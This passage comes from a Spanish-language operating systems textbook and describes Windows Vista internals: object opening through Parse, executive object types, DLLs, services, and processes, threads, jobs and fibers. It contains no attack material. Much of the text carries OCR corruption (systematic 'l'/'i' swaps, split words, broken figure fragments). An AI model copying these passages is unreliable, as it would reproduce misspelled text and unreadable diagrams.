particiones de disco lógicas, volúmenes de disco, e incluso sistemas de archivos y extensiones del 
kernel, como los filtros antivirus. M uchos drivers de dispositivos reciben nombres, por lo que se 
pueden utilizar sin tener que abrir manejadores a las instancias de los dispositivos, como en UNIX. 
Utilizaremos objetos de dispositivo para ilustrar la forma en que se utiliza el procedimiento Parse, 
como se muestra en la figura 11-22: 


1. Cuando un componente del ejecutivo (como el administrador de E/S queimplementa la lla¬ 
mada al sistema nativa NtcreateFiie) llama a obOpenObjectByName en el administrador de 
objetos, le pasa un nombre de ruta de U nicode para el espacio de nombres de NT, por de¬ 
cir \??\C:\foo\bar. 

2. El administrador de objetos busca a través de directorios y vínculos simbólicos, y en últi¬ 
ma instancia encuentra que \??\C: se refiere a un objeto de dispositivo (un tipo definido 
por el administrador de E/S). El objeto de dispositivo es un nodo hoja en la parte del espa¬ 
cio de nombres de NT que el administrador de objetos administra. 

3. Después, el administrador de objetos llama al procedimiento Parse para este tipo de obje¬ 
to, que resulta ser lopParseDevice implementado por el administrador de E/S. No solo 
pasa un apuntador al objeto de dispositivo que encontró (para C:), sino también la cadena 
restante \foo\bar. 

4. El administrador de E/S creará un IRP (1/0 Request Packet, Paquete de peticiones de E/S), 
asignará un objeto de archivo y enviará la petición a la pila de dispositivos de E/S deter¬ 
minada por el objeto de dispositivo que encontró el administrador de objetos. 
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Win32 CreateFile(C:\foo\bar) 


Administrador 
de E/S 


Administrador 
de objetos 

Administrador 
de E/S 


( 10 ) 


Modo de usuario 


Modo de kernel 


NtCreateFile{\??\C :\foo\ bar) 


( 1 )| 


(9) 


^ : Manejador: 


OpenOb]ectByName{\??\C:\foo\bar) 


(3)| 


I 


( 2 ) 


lopParseDevice(DeviceOb]ect,\foo\bar) 


Objeto 
de archivo 


(4) 


IRP 


(5) 

loCallDriver 


( 6 ) 


Filtros del sistema 
de archivos _ 


Pila de dispositivos d eC: (5) ^ loCallDriver 
(7) 


NTFS 

NtfsCreateFileO 


Devices 


99 — 


( 8 ) 


loCompleteRequest 


C: —, 


Flarddiski — 


DEVICE OBJECT: 
para el volumen C: 


SYMLINK: 

\Devices\Harddisk1 


(a) 


(b) 


Figura 11-22. Pasos del administrador de E/S y del administrador de objetos para 
crear/abrir un archivo y recuperar un manejador de archivo. 


5. EL IRP se pasa a la pila de E/S hasta que llega a un objeto dedispositivo que representa la 
instancia en el sistema de archivos para C:. En cada etapa, el control se pasa a un punto de 
entrada en el objeto de driver asociado con el objeto de dispositivo en ese nivel. El punto 
de entrada que se utiliza en este caso es para las operaciones CREATE, ya que la petición 
es para crear o abrir un archivo llamado \foo\bar en el volumen. 

6. Los objetos de dispositivo que se encuentra el IRP a medida que avanza por el sistema de 
archivos representan los drivers del filtro del sistema de archivos, que pueden modificar la 
operación de E/S antes de que llegue al objeto de dispositivo del sistema de archivos. Por 
lo general, estos dispositivos intermedios representan extensiones del sistema, como los 
filtros antivirus. 

7. El objeto de dispositivo del sistema de archivos tiene un vínculo al objeto de driver del sis¬ 
tema de archivos, por decir NTFS. Por lo tanto, el objeto de driver contiene la dirección de 
la operación CREATE dentro de NTFS. 

8. NTFS llenará el objeto de archivo y lo devolverá al administrador de E/S, el cual regresa 
a través de todos los dispositivos en la pila hasta que loppanseoevice regresa al adminis¬ 
trador de objetos (vea la sección 11.8). 

9. El administrador de objetos terminó con su búsqueda en el espacio de nombres. Recibió de 
vuelta un objeto inicializado de la rutina Parse (que resulta ser un objeto de archivo, no el 
objeto de dispositivo original que encontró). Por lo tanto, el administrador de objetos crea 
un manejador para el objeto de archivo en la tabla de manejadores del proceso actual, y de¬ 
vuelve el manejador al proceso que lo llamó. 
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10. El paso final es regresar al proceso en modo de usuario que hizo la llamada, que en este 
ejemplo es createFiie de laAPI Win32, quien devolverá el mane]ador a la aplicación. 

Los componentes del ejecutivo pueden crear nuevos tipos en forma dinámica, mediante una lla¬ 
mada a la interfaz obCreateObjectType para el administrador de objetos. No hay una lista definiti¬ 
va de tipos de objetos y cambian de una versión a otra. Algunos de los más comunes en Windows 
Vista se listan en la figura 11-23. A continuación veremos un breve análisis de los tipos de objetos 
en la figura. 


Tipo 

Descripción 

Proceso 

Proceso de usuario 

Hilo 

Hilo dentro de un proceso 

Semáforo 

Semáforo de conteo que se utiliza para la sincronización entre procesos 

Mutex 

Semáforo binario que se utiliza para entrar a una región crítica 

Evento 

Objeto de sincronización con estado persistente (señalado/no señalado) 

Puerto ALPC 

Mecanismo para pasar mensajes entre procesos 

Temporizador 

Objeto que permite a un proceso permanecer inactivo durante un intervalo fijo 

Cola 

Objeto que se utiliza para notificar la compleción en una operación de E/S 

asincrona 

Archivo abierto 

Objeto asociado con un archivo abierto 

Token de acceso 

Descriptor de seguridad para cierto objeto 

Perfil 

Estructura de datos que se utiliza para crear perfiles del uso de la CPU 

Sección 

Objeto que se utiliza para representar archivos que se pueden asignar 

Clave 

Clave del registro, se utiliza para adjuntar el registro al espacio de nombres del 
administrador de objetos 

Directorio de objetos 

Directorio para agrupar objetos dentro del administrador de objetos. 

Vínculo simbólico 

Se refiere a otro objeto del administrador de objetos por su nombre de ruta 

Dispositivo 

Objeto de dispositivo de E/S para un dispositivo físico, bus, driver o instancia de 

volumen 

Driver de dispositivo 

Cada driver de dispositivo que se carga tiene su propio objeto 


Figura 11-23. Algunos tipos de objetos comunes del ejecutivo que maneja el adminis¬ 
trador de objetos. 


Proceso e hilo son obvios. Hay un objeto para cada proceso y cada hilo, que contiene las pro¬ 
piedades principales necesarias para administrar ese proceso o hilo. Los siguientes tres objetos, se¬ 
máforo, mutex y evento, lidian con la sincronización entre procesos. Los semáforos y los mutexes 
funcionan de la manera esperada, pero con varias características adicionales (por ejemplo, valores 
máximos y tiempos límite). Los eventos pueden estar en uno de dos estados: señalados o no señala¬ 
dos. Si un hilo espera un evento que está en el estado señalado, el hilo se libera de inmediato. Si el 
evento está en el estado no señalado, se bloquea hasta que algún otro hilo señala el evento, que libe¬ 
ra a todos los hilos bloqueados (eventos de notificación) o sólo al primer hilo bloqueado (eventos de 
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sincronización). También se puede estabiecer un evento para que después de haber esperado una se- 
ñai con éxito, regrese de manera automática ai estado no señaiado en vez de permanecer en ei esta¬ 
do señaiado. 

Los objetos puerto, temporizador y coia también se reiacionan con ia comunicación y ia sin¬ 
cronización. Los puertos son canaies entre procesos para intercambiar mensajes LPC. Los tempo- 
rizadores proporcionan una manera de bioquear por un intervaio específico. Las coias se utiiizan 
para notificar a ios hiios que había empezado antes una operación de E/S asincrona, o que un puer¬ 
to tiene un mensaje en espera (están diseñados para administrar ei nivei de concurrencia en una apii- 
cación, y se utiiizan en apiicaciones muitiprocesador de aito rendimiento, como SQL). 

Los objetos de archivo abierto se crean cuando se abre un archivo. Los archivos que no están 
abiertos no tienen objetos administrados por ei administrador de objetos. Los tokens de acceso son 
objetos de seguridad. Identifican a un usuario e indican qué priviiegios especiaies tiene, si ios hay. 
L os perf i i es son estructuras que se uti i i zan para ai macenar muestras peri ódi cas dei contador dei pro¬ 
grama de un hiio en ejecución, para ver dónde invierte su tiempo ei programa. 

Las secciones se utiiizan para representar objetos de memoria que ias apiicaciones pueden pedir 
ai administrador de memoria que asigne en su espacio de direcciones. Guardan ia sección dei archivo 
(o archivo de paginación) que representa ias páginas dei objeto de memoria cuando están en ei disco. 
Las ciaves representan ei punto de montaje para ei espacio de nombres dei registro en ei espacio de 
nombres dei administrador de objetos. Por io generai sóio hay un objeto ciave, iiamado \REGISTRY, 
que conecta ios nombres de ias ciaves y ios vaiores dei registro ai espacio de nombres de NT. 

Los directorios de objetos y ios víncuios simbóiicos son por compieto iocaies para ia parte dei 
espacio de nombres de NT que maneja ei administrador de objetos. Son simiiares a sus contrapar¬ 
tes dei sistema de archivos: ios directorios permiten recoiectar objetos reiacionados. Los víncuios 
simbóiicos permiten que un nombre en una parte dei espacio de nombres de objetos se refiera a un 
objeto en una parte distinta de ese espacio de nombres. 

Cada dispositivo conocido para ei sistema operativo tiene uno o más objetos de dispositivo que 
contienen información sobre éi, y ei sistema ios utiiiza para hacer referencia ai dispositivo. Por úi- 
timo, cada driver de dispositivo que se ha cargado tiene un objeto de driver en ei espacio de obje¬ 
tos. Los objetos de drivers son compartidos por todos ios objetos de dispositivos que representan 
instancias de ios dispositivos controiados por esos drivers. 

Hay otros objetos que no se muestran y tienen propósitos más especi ai izados, como interactuar 
con ias transacciones dei kernei, o ia fábrica de hiios trabajadores de ia reserva de hiios deWin32. 

11.3.4 Subsistemas, DL L s y servicios en modo de usuario 

Si regresamos a ia figura 11-6 podemos ver que ei sistema operativo Windows Vista consiste en 
componentes en modo de kernei y componentes en modo de usuario. Ahora hemos compietado 
nuestra descripción generai de ios componentes en modo de kernei; por io tanto, es tiempo de ana- 
iizar ios componentes en modo de usuario, de ios cuaies hay tres tipos que son especiaimente im¬ 
portantes para Windows: subsistemas dei entorno, DLLsy procesos deservicio. 

Ya hemos descrito ei modeio de subsistemas de Windows: no entraremos en más detaiies 
ahora, sóio mencionaremos que en ei diseño originai de NT ios subsistemas se veían como una 
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forma de proporcionar varias personaiidades dei sistema operativo, donde se ejecuta ei mismo 
software subyacente en modo de kernei. Tai vez esto era un intento por evitar que ios sistemas 
operativos compitieran por ia misma piataforma, como hicieron VMS y Berkeiey UNIX en la 
VAX de DEC. O quizá nadie en M icrosoft sabía si OS/2 tendría éxito como interfaz de progra¬ 
mación, o tal vez estaban cubriendo sus apuestas. De cualquier forma, OS/2 se hizo irrelevante y 
el participante tardío, la A Pl Win32 diseñada para compartirla con Windows 95, terminó como la 
interfaz dominante. 

Un segundo aspecto clave del diseño en modo de usuario de Windows es la biblioteca de víncu¬ 
los dinámicos (DL L), la cual consiste en código que se vincula a los programas ejecutables en tiem¬ 
po de ejecución, en vez de hacerlo en tiempo de compilación. Las bibliotecas compartidas no son 
un nuevo concepto, y la mayoría de los sistemas operativos modernos las utilizan. En Windows ca¬ 
si todas las bibliotecas son DLLs, desde la biblioteca del sistema ntdll.dll que se carga en cada pro¬ 
ceso en las bibliotecas de alto nivel de funciones comunes, destinadas para permitir que los 
desarrolladores de aplicaciones reutilicen el código proliferante. 

Las DLLs mejoran la eficiencia del sistema, ya que permiten compartir código común entre 
procesos, reducen los tiempos de carga de programas del disco al mantener el código de uso común 
en la memoria, e incrementan la capacidad de servicio del sistema al permitir actualizar el código 
de la biblioteca del sistema operativo sin tener que recompilar o volver a enlazar los programas de 
aplicación que la utilizan. 

Por otra parte, las bibliotecas compartidas introducen el problema del control de versiones y 
aumentan la complejidad del sistema, ya que los cambios introducidos en una biblioteca comparti¬ 
da para ayudar a un programa específico tienen el potencial de exponer errores latentes en otras 
aplicaciones, o tal vez sólo fallen debido a los cambios en la implementación, un problema que en 
el mundo de Windows se conoce como infierno de ias DLLs. 

La implementación de las DLLs es simple en concepto. En vez de que el compilador emita 
código que llame directamente a las subrutinas en la misma imagen ejecutable, se introduce un ni¬ 
vel de indirección: la lAT (Import Address Table, Tabla de direcciones de importación). Cuando 
se carga un ejecutable, se busca la lista de DLLs que también se deben cargar (esto será un grafo 
en general, ya que, por lo general, las mismas DLLs que aparezcan en la lista también requerirán 
una lista de otras DLLs para poder ejecutarse). Las DLLs requeridas se cargan y se llena la lAT 
para todas. 

La realidad es más complicada. Otro problema es que los gratos que representan las relaciones 
entre las DLLs pueden contener ciclos, o tener comportamientos no determinísticos, por lo que el 
cálculo de la lista de DL L s que se deben cargar puede producir una secuencia que no funcione. A de¬ 
más, en Windows las bibliotecas DLL tienen la oportunidad de ejecutar código cada vez que se car¬ 
gan en un proceso, o cuando se crea un hilo. Por lo general, esto se hace para que puedan realizar 
la inicialización o asignar el almacenamiento por hilo, pero muchas DLLs realizan muchos cálcu¬ 
los en estas rutinas para adjuntar. Si cualquiera de las funciones llamadas en una rutina para adjun¬ 
tar necesita examinar la lista de DL Ls cargadas, puede ocurrir un interbloqueo que deje suspendido 
el proceso. 

Las DLLs se utilizan para algo más que compartir código común. Permiten un modelo de hos- 
ting para extender las aplicaciones. Internet Explorer puede descargar y crear vínculos a DLLs co¬ 
nocidas como controles ActiveX. En el otro extremo de Internet, los servidores Web también 
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pueden cargar código dinámico para producir una mejor experiencia Web para ias páginas que 
muestran. Las apiicaciones como M icrosoft Office vincuian y ejecutan DLLs para poder utiiizar 
Office como una piataforma para construir otras apiicaciones. Ei estiio COM, ei modeio de objetos 
componentes, de programación permite a ios programas buscar y cargar en forma dinámica ei có¬ 
digo escrito para proporcionar una interfaz pubiicada específica, io cuai produce ei hosting de ias 
DLLs dentro dei proceso para casi todas ias apiicaciones que utiiizan COM . 

Toda esta carga dinámica de código ha producido una compiejidad aun mayor para ei sistema 
operativo, ya que ia administración de versiones de bibiiotecas no es sóio una cuestión de asociar 
ios ejecutabies a ias versiones correctas de ias DLLs, sino queaigunas veces hay que cargar varias 
versiones de ia misma DLL en un proceso: a esto M icrosoft io denomina lado a lado. Un soio pro¬ 
grama puede hospedar dos bibiiotecas de código dinámicas distintas, cada una de ias cuai es tai vez 
tenga que cargar ia misma bibiioteca de Windows, pero aún así tiene distintos requerimientos de 
versión para esa bibiioteca. 

Una mejor soiución sería hospedar ei código en procesos separados. Pero hospedar código fue¬ 
ra dei proceso produce un menor rendimiento, y en muchos casos se tiene un modeio de programa¬ 
ción más compiicado. Microsoft todavía no ha desarroiiado una buena soiución para toda esta 
compiejidad en modo de usuario. Por esta razón, ios programadores anheian ia simpiicidad reiati- 
va dei modo de kernei. 

Una de ias razones por ias que ei modo de kernei tiene menos compiejidad que ei modo de 
usuario es que proporciona reiativamente pocas oportunidades de extensibiiidad fuera dei modeio 
de driver de dispositivo. En Windows, ia funcionaiidad dei sistema se extiende mediante ia escritu¬ 
ra de servicios en modo de usuario. Esto funciona bien para ios subsistemas y aún mejor cuando se 
proporcionan sóio unos cuantos servicios en vez de una personaiidad compieta dei sistema operati¬ 
vo. Hay reiativamente menos diferencias funcionaies entre ios servicios que se impiementan en ei 
kernei, y ios servicios que se i mpi ementan en ios procesos en modo de usuario. Tanto ei kernei co¬ 
mo ei proceso proporcionan espacios de direcciones privadas en donde se pueden proteger ias es¬ 
tructuras de datos y se pueden escudriñar ias peticiones de servicio. 

Sin embargo, puede haber diferencias considerabies en ei rendimiento entre ios servicios en ei 
kernei y ios servicios en ios procesos en modo de usuario. Ei proceso de entrar ai kernei desde 
ei modo de usuario es iento en ei hardware moderno, pero no tanto como tener que hacerio dos ve¬ 
ces ai cambiar entre ese proceso y otro. Además, ia comunicación entre proceso tiene un menor an¬ 
cho de banda. 

Ei código en modo de kernei puede acceder (con mucho cuidado) a ios datos en ias direccio¬ 
nes en modo de usuario que se pasan como parámetros a sus ñamadas ai sistema. Con ios servicios 
en modo de usuario, esos datos se deben copiar ai proceso de servicio, o se debe jugar con ia asig¬ 
nación de ia memoria entre un proceso y otro (ias herramientas deALPC en Windows Vista se en¬ 
cargan de esto en segundo piano). 

En ei futuro es posibie que se reduzcan ios requerimientos en ei hardware para tener que cam¬ 
biar entre ios espacios de direcciones y ios modos de protección, o tai vez se vueiva irreievante. Ei 
proyecto Singuiaridad en M icrosoft Research (Fandrich y coiaboradores, 2006) utiiiza técnicas en 
tiempo de ejecución como ias que se utiiizan con C#y java, para que ia protección sea una cues¬ 
tión sóio dei software. No se requiere cambiar mediante ei hardware entre ios espacios de direccio¬ 
nes o ios modos de protección. 
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Windows Vista utiiiza de manera considerabie ios procesos de servicio en modo de usuario pa¬ 
ra extender ia funcionaiidad dei sistema. Aigunos de estos servicios tienen iazos estrechos con ia 
operación de ios componentes en modo de kernei como isass.exe, ei servicio de autenticación de se¬ 
guridad iocai que administra ios objetos de token que representan ia identidad dei usuario, y tam¬ 
bién administra ias ciaves de cifrado utiiizadas por ei sistema de archivos. Ei administrador de 
piug-and-piay en modo de usuario es responsabie de determinar ei driver correcto que debe utiiizar 
ai encontrar un nuevo dispositivo de hardware, instaiario y decir ai kernei que io cargue. M uchas 
herramientas proporcionadas por terceras partes, como ios antivirus y ia administración de ios de¬ 
rechos digitaies, se impiementan como una combinación de drivers en modo de kernei y servicios 
en modo de usuario. 

En Windows Vista, taskmgr.exe tiene una ficha que identifica ios servicios que se ejecutan en 
ei sistema (ias versiones anteriores de Windows muestran una iista de servicios con ei comando net 
start). Se pueden ver varios servicios en ejecución en ei mismo proceso (svchost.exe). Windows ha¬ 
ce esto para muchos de sus propios servicios en tiempo de inicio, para reducir ei tiempo necesario 
para iniciar ei sistema. Los servicios se pueden combinar en ei mismo proceso, siempre y cuando 
puedan operar en forma segura con ias mismas credenciaies de seguridad. 

Dentro de cada uno de ios procesos de servicio compartidos, ios servicios individuaies se car¬ 
gan como DLLs. Por io generai comparten una reserva de hiios mediante ia herramienta de reserva 
de hiios de Win32, de manera quesóio ei mínimo número de hiios tienen que estar en ejecución en¬ 
tre todos ios servicios residentes. 

Los servicios son fuentes comunes de vuinerabiiidades de seguridad en ei sistema, debido a 
que con frecuencia se puede acceder a eiios en forma remota (dependiendo de ias configuracio¬ 
nes dei firewaii deTCP/IP y de seguridad IP), y no todos ios programadores que escriben servi¬ 
cios son tan cuidadosos como deberían para vaiidar ios parámetros y búferes que se pasan 
mediante RPC. 

Ei número de servicios que se ejecutan de manera constante en Windows es asombroso. Aun 
así, pocos de esos servicios reciben una soia petición, aunque si io hacen es probabie que proven¬ 
gan de un atacante que trate de expiotar una vuinerabiiidad. Como resuitado, cada vez más servi¬ 
cios en Windows se desactivan de manera predeterminada, en especiai en ias versiones de Windows 
Server. 

11.4 PROCESOSE HILOS EN WINDOWS VISTA 

Windows tiene varios conceptos para administrar ia CPU y agrupar ios recursos entre sí. En ias si¬ 
guientes secciones examinaremos estos conceptos y anaiizaremos aigunas de ias iiamadas reievan- 
tes a iaAPI Win32 y cómo se impiementan. 

11.4.1 Conceptos fundamentales 

En Windows Vista, ios procesos son contenedores para ios programas. Contienen ei espacio de di¬ 
recciones virtuaies, ios manejadoras que hacen referencia a ios objetos en modo de kernei y ios hi¬ 
ios. En su papei como contenedor para ios hiios, contienen ios recursos comunes que se utiiizan 
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para la ejecución de hilos, como el apuntador a la estructura de cuotas, el objeto de token compar¬ 
tido y los parámetros predeterminados que se utilizan para inicializar hilos; incluyendo la prioridad 
y la clase de planificación. Cada proceso tiene datos del sistema en modo de usuario, conocidos co¬ 
mo PEB (Process Environment Block, Bloque de entorno del proceso). El PEB incluye la lista de 
módulos cargados (es decir, los EX Es y DLLs), la memoria que contiene cadenas del entorno, el di¬ 
rectorio actual de trabajo y datos para administrarlos montículos del proceso: así como también un 
montículo de código de Win32 de casos especiales que se ha acumulado con el tiempo. 

Los hilos son la abstracción del kernel para programar la CPU en Windows. Se asignan priorida¬ 
des a cada hilo con base en el valor de prioridad en el proceso contenedor. Los hilos también pueden 
tener afinidad para ejecutarse sólo en ciertos procesadores. Esto ayuda a los programas concurrentes 
que se ejecutan en multiprocesadores a esparcir el trabajo de manera explícita. Cada hilo tiene dos 
pilas de llamadas separadas, una para la ejecución en modo de usuario y la otra para el modo de 
kernel. También hay un TEB (Thread Environment Block, Bloque de entorno de hilo) que mantie¬ 
ne los datos en modo de usuario específicos para el hilo, incluyendo el almacenamiento por hilo 
(Thread Local Storage, Almacenamiento local de hilo) y campos para Win32, de lenguaje y locali¬ 
zación cultural, además de otros campos especializados que se han agregado mediante varias herra¬ 
mientas. 

Además de los PEBs y losTEBs, hay otra estructura de datos que el modo de kernel compar¬ 
te con cada proceso: a saber, los datos compartidos de usuario. Ésta es una página que el kernel 
puede escribir, pero es de sólo lectura en todos los procesos en modo de usuario. Contiene varios 
valores mantenidos por el kernel, como varias formas de hora, información de la versión, cantidad 
de memoria física y un gran número de banderas compartidas que utilizan varios componentes en 
modo de usuario, como COM , los servicios de terminal y los depuradores. El uso de esta página 
compartida de sólo lectura es sólo una optimización del rendimiento, ya que los valores también se 
pueden obtener mediante una llamada al sistema en modo de kernel. Pero las llamadas al sistema 
son mucho más costosas que un solo acceso a memoria, por lo que para ciertos campos mantenidos 
por el sistema (como la hora) esto tiene mucho sentido. Los otros campos (como la zona horaria ac¬ 
tual) cambian con poca frecuencia, pero el código que depende de estos campos los debe consultar 
con frecuencia sólo para ver si han cambiado. 


Procesos 

Los procesos se crean a partir de objetos de sección, cada uno de los cuales describe un objeto de 
memoria respaldado por un archivo en el disco. Cuando se crea un proceso, el proceso creador re¬ 
cibe un manejador para el proceso creado, el cual le permite modificar el nuevo proceso mediante 
la asignación de secciones y de memoria virtual, la escritura de parámetros y datos sobre el entor¬ 
no, la duplicación de descriptores de archivos en su tabla de manejadoras y la creación de hilos. Es¬ 
to es muy distinto a la forma en que se crean los procesos en UNIX, y refleja la diferencia en los 
sistemas de destino para los diseños originales de UNIX en comparación con Windows. 

Como vimos en la sección 11.1, UNIX se diseñó para sistemas de un solo procesador de 16 
bits, que utilizaban el intercambio para compartirla memoria entre procesos. En dichos sistemas era 
una idea brillante tener el proceso como la unidad de concurrencia y utilizar una operación como 
fork para crear procesos. Para ejecutar un nuevo proceso con poca memoria y sin hardware de me- 
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moria virtual, los procesos en memoria se tienen que intercambiar hacia el disco para crear espacio. 
En un principio, Unix implementaba fork sólo para intercambiar el proceso padre hacia el disco y 
pasar su memoria física al hijo. La operación casi no tenía repercusiones. 

Por el contrario, el entorno de hardware cuando el equipo de Cutler escribió NT eran los siste¬ 
mas mui ti procesadores de 32 bits, con hardware de memoria virtual para compartir de 1 a 16 M B 
de memoria física. Los multiprocesadores ofrecen la oportunidad de ejecutar partes de los progra¬ 
mas en forma concurrente, por lo que NT utilizaba los procesos como contenedores para compartir 
la memoria y los recursos délos objetos, y utilizaba los hilos como la unidad de concurrencia para la 
programación. 

Desde luego que los sistemas de los próximos años no se parecerán en nada a estos entornos 
de destino, ya que tendrán espacios de direcciones de 64 bits con docenas (o cientos) de núcleos de 
CPU por cada Socket de chip, y varios GB de memoria física: así como también dispositivos flash 
y otros tipos de almacenamiento no volátil agregados a la jerarquía de memoria, un mayor soporte 
para la virtualización, redes ubicuas y soporte para las innovaciones de sincronización como la me¬ 
moria transaccional. Windows y UNIX seguirán adaptándose a las nuevas realidades del hardwa¬ 
re, pero lo realmente interesante será ver qué nuevos sistemas operativos están diseñados de manera 
específica para los sistemas, con base en estos avances. 

Trabajos y fibras 

Windows puede agrupar los procesos en trabajos, pero la abstracción de trabajo no es muy general. 
Se diseñó de manera específica para agrupar procesos y poder aplicar restricciones a los hilos que 
contienen, como la limitación del uso délos recurso por medio de una cuota compartida o la imple- 
mentación de un token restringido para evitar que los hilos accedan a muchos objetos del sistema. 
La propiedad más importante de los trabajos para la administración de recursos es que, una vez que 
un proceso está en un trabajo, todos los procesos que los hilos creen en esos procesos también es¬ 
tarán en la tarea. No hay escapatoria. Como lo sugiere el nombre, los trabajos se diseñaron para si¬ 
tuaciones que se parecen más al procesamiento por lotes que la computación interactiva ordinaria. 

Un proceso puede estar en (a lo más) un trabajo. Esto tiene sentido, pues es difícil definir el 
significado de que un proceso esté sujeto a varias cuotas compartidas o tokens restringidos. Pero es¬ 
to significa que si varios servicios en el sistema tratan de usar trabajos para administrar procesos, 
habrá conflictos si intentan administrar los mismos procesos. Por ejemplo, una herramienta admi¬ 
nistrativa que tratara de restringir el uso de los recursos al colocar procesos en tareas se frustraría 
si el proceso primero se inserta a sí mismo en su propio trabajo, o si una herramienta de seguridad 
ya hubiera colocado el proceso en un trabajo con un token restringido para limitar su acceso a los 
objetos del sistema. Como resultado, el uso de trabajos en Windows es raro. 

La figura 11-24 muestra la relación entre trabajos, procesos, hilos y fibras. Los trabajos contie¬ 
nen procesos. Los procesos contienen hilos. Pero los hilos no contienen fibras. La relación entre los 
hilos y las fibras es por lo general de varios a varios. 

Para crear fibras, se asigna una pila y una estructura de datos tipo fibra en modo de usuario pa¬ 
ra almacenar los registros y datos asociados con la fibra. Los hilos se convierten en fibras, pero las 
fibras también se pueden crear en forma independiente a los hilos. Dichas fibras no se ejecutarán 
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Tarea 


Proceso 

Proceso 


i/ 

Hilo Hilo Hilo 

Hilo Hilo 



_i L. 


_i L_ 


_i L_ 


_i L_ 




Figura 11-24. La relación entre tareas, procesos, hilos y fibras. Las tareas y las fibras 
son opcionales: no todos los procesos están en tareas o contienen fibras. 


sino hasta que una fibra que ya se esté ejecutando en un hilo llame de manera explícita a switch- 
ToFiber para ejecutar la fibra. Los hilos podrían tratar de cambiar a la fibra que ya se está ejecutan¬ 
do, por lo que el programador debe proporcionar la sincronización para evitarlo. 

La principal ventaja de las fibras es que la sobrecarga de cambiar entre una fibra y otra es bas¬ 
tante menor que la sobrecarga de cambiar entre un hilo y otro. Para un cambio de hilo se requiere 
entrar y salir del kernel. En un cambio de fibra se guardan y restauran unos cuantos registros sin 
cambiar los modos. 

A unque las fibras se programan en forma cooperativa, si hay varios hilos que programan las fi¬ 
bras se requiere mucha sincronización cuidadosa para asegurar que éstas no interfieran entre sí. Pa¬ 
ra simplificar la interacción entre los hilos y las fibras, a menudo es conveniente crear sólo la 
cantidad de hilos equivalente al número de procesadores disponibles para ejecutarlos, y usar la afi¬ 
nidad de los hilos para que cada uno se ejecute sólo en un conjunto distinto de procesadores dispo¬ 
nibles, o incluso en un solo procesador. 

Así, cada hilo puede ejecutar un subconjunto específico de las fibras, para establecer una rela¬ 
ción de uno a varios entre los hilos y las fibras que simplifique la sincronización. Aun así, de todas 
formas hay muchas dificultades con las fibras. La mayoría de las bibliotecas de Win32 no conocen 
las fibras en lo absoluto, y las aplicaciones que tratan de utilizarlas como si fueran hilos encontra¬ 
rán varias fallas. El kernel no tiene conocimiento de las fibras, y cuando una de ellas entra al ker¬ 
nel, el hilo en el que se ejecuta se puede bloquear y el kernel programará un hilo arbitrario en el 
procesador, con lo cual no podrá ejecutar otras fibras. Por estas razones, las fibras se utilizan raras 
veces, excepto al portar código de otros sistemas que necesitan de manera explícita la funcionali¬ 
dad que proporcionan. En la figura 11-25 se muestra un resumen de estas abstracciones. 

Hilos 

Por lo general, cada proceso empieza con un hilo, pero se pueden crear nuevos en forma dinámica. 
Los hilos forman la base de la programación de la CPU, ya que el sistema operativo siempre selec¬ 
ciona un hilo para ejecutarlo, no un proceso. En consecuencia, cada hilo tiene un estado (listo, en 
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Nombre 

Descripción 

Notas 

Tarea 

Colección de procesos que comparten cuotas y límites 

Se utiliza raras veces 

Proceso 

Contenedor para guardar recursos 


Hilo 

Entidad programada mediante el kernel 


Fibra 

Hilo ligero que se administra por completo en espacio de usuario 

Se utiliza raras veces 


Figura 11-25. Conceptos básicos que se utilizan para la administración de la CPU 
y los recursos. 


ejecución, bloqueado, etc.), mientras que los procesos no tienen estados de planificación. Los hilos 
se pueden crearen forma dinámica mediante una llamada a Win32 que especifique la dirección den¬ 
tro del espacio de direcciones del proceso circundante en la que va a empezar su ejecución. 

Cada hilo tiene un ID de hilo, el cual se toma del mismo espacio de nombres que los IDs 
del proceso, por lo que un proceso y un hilo nunca pueden utilizar un solo ID al mismo tiempo. 
Los IDs de procesos y de hilos son múltiplos de cuatro, debido a que en realidad los asigna el eje¬ 
cutivo mediante una tabla de manejadores especial, que se separa para la asignación de IDs. El sis¬ 
tema reutiliza la herramienta de administración de manejadores escaladle que se muestra en las 
figuras 11-18 y 11-19. La tabla de manejadores no tiene referencias en los objetos, pero utiliza el 
campo de apuntador para apuntar al proceso o hilo, de manera que la búsqueda de un proceso o de 
un hilo por su ID es muy eficiente. El ordenamiento PIFO de la lista de manejadores libres se acti¬ 
va para la tabla de IDs en versiones recientes de Windows, de manera que los IDs no se reutilicen 
de inmediato. Al final de este capítulo exploraremos los problemas con la reutilización inmediata, 
en la sección de problemas. 

Por lo general, un hilo se ejecuta en modo de usuario, pero cuando hace una llamada al sistema, 
cambia al modo de kernel y continúa su ejecución como el mismo hilo con las mismas propiedades 
y límites que tenía en modo de usuario. Cada hilo tiene dos pilas, una para usarla cuando está en mo¬ 
do de usuario y otra para usarla en modo de kernel. Cada vez que un hilo entra al kernel, cambia a 
la pila en modo de kernel. Los valores de los registros en modo de usuario se guardan en una estruc¬ 
tura de datos llamada CONTEXT en la base de la pila en modo de kernel. Como la única forma de 
que un hilo en modo de usuario no se ejecute es que entre al kernel, el contexto (CONTEXT) para 
un hilo siempre contiene el estado de sus registros cuando no se ejecuta. El contexto (CONTEXT) 
para cada hilo se puede examinar y modificar desde cualquier proceso que tenga un manej ador para 
ese hilo. 

Por lo general, los hilos se ejecutan mediante el token de acceso del proceso que los contiene, 
pero en ciertos casos relacionados con el modelo cliente/servidor, un hilo que se ejecuta en un pro¬ 
ceso de servicio puede hacerse pasar por su cliente, mediante el uso de un token de acceso tempo¬ 
ral con base en el token del cliente, para que pueda realizar operaciones a su beneficio (en general, 
un servicio no puede utilizar el token actual del cliente, ya que el cliente y el servidor se pueden 
ejecutar en distintos sistemas). 

Los hilos también son el punto focal normal para la E/S. Los hilos se bloquean al realizar ope¬ 
raciones de E/S síncronas, y los paquetes de petición de E/S restantes para las operaciones de E/S 
asincronas se vinculan con el hilo. Cuando un hilo termina su ejecución, puede concluir. Cualquier 
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petición de E/S pendiente para ei hiio secanceiará. Cuando ei hiio que aún esté activo en un proce¬ 
so termine, ei proceso terminará. 

Es importante tener en cuenta que ios hiios son un concepto de programación, no de propiedad 
de recursos. Cuaiquier hiio puede acceder a todos ios objetos que pertenecen a su proceso. Todo io 
que tiene que hacer es utiiizarei vaiordei manejadory haceria iiamada apropiada a Win32. No hay 
restricción en un hiio que no pueda accederá un objeto sóio porque otro hiio distinto io haya abier¬ 
to o creado. Ei sistema ni siquiera mantiene ei registro de cuái hiio creó cuái objeto. Una vez que 
un manejador secoioca en ia tabia de manejadores de un proceso, cuaiquier hiio en ei proceso pue¬ 
